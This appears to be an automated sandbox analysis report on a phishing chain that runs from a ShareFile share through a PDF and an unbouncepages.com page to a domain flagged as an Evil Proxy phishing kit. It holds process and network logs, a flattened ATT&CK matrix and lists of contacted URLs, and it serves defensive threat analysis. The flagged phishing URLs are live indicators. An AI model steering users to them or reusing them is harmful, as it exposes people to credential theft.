            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50293
            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.19.74.158:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.19.74.158:443 -> 192.168.2.6:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49903 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49998 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50125 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:50177 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50193 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50259 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50314 version: TLS 1.2
            Source: classification engineClassification label: mal84.phis.win@78/244@97/30
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\e78e0c34-0812-41d4-8570-4a0465835353.tmpJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-09 14-06-24-151.logJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2252,i,4924917487145762283,2033934447409194097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://premierbb.sharefile.com/public/share/web-189361297164461c"
            Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Action-Confidential.pdf"
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1632,i,2415105294210288896,4145336450778685438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://unbouncepages.com/99392004001023/"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,1674931386176375637,9340985270672291635,262144 /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2252,i,4924917487145762283,2033934447409194097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1632,i,2415105294210288896,4145336450778685438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,1674931386176375637,9340985270672291635,262144 /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\crash_reporter.cfgJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 403
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 431Jump to dropped file
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 475
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 403Jump to dropped file
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 475Jump to dropped file
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
            Process Injection
            11
            Masquerading
            OS Credential Dumping1
            System Information Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media5
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive6
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530187 URL: https://premierbb.sharefile... Startdate: 09/10/2024 Architecture: WINDOWS Score: 84 39 x1.i.lencr.org 2->39 41 events.launchdarkly.com 2->41 43 chrome.cloudflare-dns.com 2->43 53 Found malware configuration 2->53 55 AI detected phishing page 2->55 57 Yara detected Evil Proxy Phishing kit 2->57 59 4 other signatures 2->59 8 chrome.exe 2->8         started        10 chrome.exe 14 2->10         started        13 Acrobat.exe 17 68 2->13         started        15 chrome.exe 2->15         started        signatures3 process4 dnsIp5 17 chrome.exe 8->17         started        47 192.168.2.4 unknown unknown 10->47 49 192.168.2.6 unknown unknown 10->49 51 239.255.255.250 unknown Reserved 10->51 20 chrome.exe 10->20         started        22 AcroCEF.exe 92 13->22         started        process6 dnsIp7 27 hrv56k8ryi.ferrovelho.shop 203.161.61.149 VNPT-AS-VNVNPTCorpVN Malaysia 17->27 29 142.250.181.228 GOOGLEUS United States 17->29 35 6 other IPs or domains 17->35 31 sf-renderx-us-east-1.sharefile.com 15.197.239.217 TANDEMUS United States 20->31 33 18.173.205.42 MIT-GATEWAYSUS United States 20->33 37 31 other IPs or domains 20->37 24 AcroCEF.exe 2 22->24         started        process8 dnsIp9 45 chrome.cloudflare-dns.com 172.64.41.3 CLOUDFLARENETUS United States 24->45

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            hvhuo1.timesbella.com
            104.21.89.89
            truefalse
              unknown
              fastly-tls12-bam.nr-data.net
              162.247.243.29
              truefalse
                unknown
                chrome.cloudflare-dns.com
                172.64.41.3
                truefalse
                  unknown
                  sf-renderx-us-east-1.sharefile.com
                  15.197.239.217
                  truefalse
                    unknown
                    0093b71e39a6.us-east-1.sdk.awswaf.com
                    18.239.83.12
                    truefalse
                      unknown
                      js-agent.newrelic.com
                      162.247.243.39
                      truefalse
                        unknown
                        events.launchdarkly.com
                        52.23.25.235
                        truefalse
                          unknown
                          d274vr1q96ipg8.cloudfront.net
                          18.173.205.84
                          truefalse
                            unknown
                            sf-cv.sharefile.com
                            76.223.1.166
                            truefalse
                              unknown
                              premierbb.sharefile.com
                              13.248.193.251
                              truefalse
                                unknown
                                piletfeed-cdn.sharefile.io
                                13.224.189.109
                                truefalse
                                  unknown
                                  0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                  18.173.205.91
                                  truefalse
                                    unknown
                                    s3-w.us-east-1.amazonaws.com
                                    52.217.235.169
                                    truefalse
                                      unknown
                                      builder-assets.unbounce.com
                                      13.224.189.30
                                      truefalse
                                        unknown
                                        51.138.111.34.bc.googleusercontent.com
                                        34.111.138.51
                                        truefalse
                                          unknown
                                          o49063.ingest.sentry.io
                                          34.120.195.249
                                          truefalse
                                            unknown
                                            unbouncepages.com
                                            104.18.34.21
                                            truefalse
                                              unknown
                                              hrv56k8ryi.ferrovelho.shop
                                              203.161.61.149
                                              truetrue
                                                unknown
                                                www.google.com
                                                142.250.185.196
                                                truefalse
                                                  unknown
                                                  api.ipify.org
                                                  104.26.13.205
                                                  truefalse
                                                    unknown
                                                    premierbb.sf-api.com
                                                    76.223.1.166
                                                    truefalse
                                                      unknown
                                                      85.204.107.34.bc.googleusercontent.com
                                                      34.107.204.85
                                                      truefalse
                                                        unknown
                                                        cdn.jsdelivr.net
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          citrix-sharefile-data.customer.pendo.io
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            app.launchdarkly.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              x1.i.lencr.org
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                citrix-sharefile-content.customer.pendo.io
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  bam.nr-data.net
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    storage-cf-us.sharefile.com
                                                                    unknown
                                                                    unknownfalse
                                                                      unknown
                                                                      sf-temp-us-east-1-production.s3.amazonaws.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/index.jsfalse
                                                                          unknown
                                                                          https://premierbb.sharefile.com/bundles/pdfworker.71b2fed3d97c2433b14536a2de71ac7a.jsfalse
                                                                            unknown
                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/index.jsfalse
                                                                              unknown
                                                                              https://premierbb.sharefile.com/bundles/2bd6acf87747a8fbd76a.giffalse
                                                                                unknown
                                                                                https://hrv56k8ryi.ferrovelho.shop/m/jx/XCOMR0LVXHD2CSC9IZW3DTEPGfalse
                                                                                  unknown
                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.jsfalse
                                                                                    unknown
                                                                                    https://hrv56k8ryi.ferrovelho.shop/m/mxl/sig_op.svgfalse
                                                                                      unknown
                                                                                      https://premierbb.sf-api.com/sf/v3/Shares(189361297164461c)/Items(st31ee83-7bff-445d-8b76-231696d63572)/ProtocolLinks(Web)?action=Viewfalse
                                                                                        unknown
                                                                                        https://hrv56k8ryi.ferrovelho.shop/m/bxg/8E4FPBTMKDVQ7J1X70XYU2X3Sfalse
                                                                                          unknown
                                                                                          https://premierbb.sharefile.com/share/view/189361297164461cfalse
                                                                                            unknown
                                                                                            https://premierbb.sharefile.com/bundles/7ba6967109e88a8ecd8d.jsfalse
                                                                                              unknown
                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.jsfalse
                                                                                                unknown
                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-aggregator-pilet/1.0.7/package/dist/main.cssfalse
                                                                                                  unknown
                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.jsfalse
                                                                                                    unknown
                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.jsfalse
                                                                                                      unknown
                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/index.jsfalse
                                                                                                        unknown
                                                                                                        https://hrv56k8ryi.ferrovelho.shop/m/ecpt/8SP5UFUDB7ATU5HVLW4D116DGfalse
                                                                                                          unknown
                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/index.jsfalse
                                                                                                            unknown
                                                                                                            http://builder-assets.unbounce.com/published-css/main-ebbfc5e.z.cssfalse
                                                                                                              unknown
                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/main.cssfalse
                                                                                                                unknown
                                                                                                                http://unbouncepages.com/99392004001023/false
                                                                                                                  unknown
                                                                                                                  https://citrix-sharefile-content.customer.pendo.io/guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQfalse
                                                                                                                    unknown
                                                                                                                    https://premierbb.sharefile.com/bundles/ba7dfd1a6326f1b75478.jsfalse
                                                                                                                      unknown
                                                                                                                      https://premierbb.sharefile.com/bundles/1c992ae0c14e95098d9a.jsfalse
                                                                                                                        unknown
                                                                                                                        https://premierbb.sharefile.com/bundles/c3b78c86faf44765071f.jsfalse
                                                                                                                          unknown
                                                                                                                          https://hrv56k8ryi.ferrovelho.shop/m/sm/U6UPYHP3YF8AQVXD4ZG42QH3Rfalse
                                                                                                                            unknown
                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/index.jsfalse
                                                                                                                              unknown
                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/index.jsfalse
                                                                                                                                unknown
                                                                                                                                https://events.launchdarkly.com/events/diagnostic/5f33f5d44f29ea099db90d2afalse
                                                                                                                                  unknown
                                                                                                                                  https://premierbb.sharefile.com/bundles/d178f6eceb0126b1e292.jsfalse
                                                                                                                                    unknown
                                                                                                                                    https://premierbb.sharefile.com/bundles/4229061ac836f0f16eea.jsfalse
                                                                                                                                      unknown
                                                                                                                                      https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmtrue
                                                                                                                                        unknown
